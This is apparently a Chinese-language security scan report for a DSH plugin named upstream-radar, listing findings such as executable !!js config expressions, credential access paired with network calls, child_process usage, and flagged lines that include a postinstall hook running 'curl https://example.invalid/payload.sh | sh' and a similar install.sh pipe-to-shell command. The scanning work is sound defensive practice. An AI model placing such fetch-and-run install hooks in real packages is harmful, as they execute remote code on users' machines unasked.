中HT-CONFIG-001Cordis 配置包含可执行 !!js 表达式
置信度 高L3 · DSH 权限语义
cordis.patch.yml:7GitHub
7!!js process.env.UPSTREAM_RADAR_CONFIG
规则备注 · 表达式访问模块、进程或网络,超出读取注入服务的常规用法
!!js 是 DSH 的官方配置机制;只有表达式引入模块、访问进程或网络时才超出常规用法。
修复建议只读取注入的服务;需要更多能力时改为结构化配置并记录副作用。
面向 DSH 插件的常驻依赖安全监控:追踪实际安装路径、OSV 漏洞、npm 发布和破坏性更新信号,再把项目证据交给 DSH Agent。
在 350 个文件中有 28 项有效发现(置信度 ≥ 中)。
7!!js process.env.UPSTREAM_RADAR_CONFIG
8!!js process.env.UPSTREAM_RADAR_STATE
33credential access at line 33 + outbound network at line 104
该文件属于开发用 showcase 脚本(未列入 package.json files 字段,不随 npm 包发布),仅在显式传入 --env-file 或用户自行设置 ISSUE_LOCATOR_LLM_* 环境变量时,把该 baseUrl/apiKey 用于用户自己配置的 LLM 服务,属于案例分析工具的正常功能。
1904credential access at line 1904 + outbound network at line 1778
读取标准 GITHUB_TOKEN 环境变量并注入 UpstreamObserverClient,用于向 GitHub API 发起认证请求以监控依赖发布/变更,凭据发往其本身对应的服务方,符合插件“追踪上游变更”的既定用途。
3node:child_process
2node:child_process
1node:child_process
2node:child_process
1node:child_process
4node:child_process
3spawnSync
3node:child_process
3spawnSync
3node:child_process
5node:child_process
2spawnSync
2node:child_process
2spawnSync
2node:child_process
4spawnSync
4node:child_process
2node:child_process
2node:child_process
2node:child_process
7node:child_process
1spawnSync
1node:child_process
3node:child_process
5"postinstall": "curl https://example.invalid/payload.sh | sh"
5curl https://example.invalid/payload.sh | sh
6"postinstall": "node ./index.js"
6"prepare": "node scripts/build.js"
24curl https://example.invalid/payload.sh | sh
2spawnSync
2node:child_process
6node:child_process
2spawnSync
2node:child_process
2spawnSync
2node:child_process
33curl https://example.invalid/install.sh | sh
69curl https://example.invalid/install.sh | sh
[](https://dshmod.com/plugins/micromilo-upstream-radar)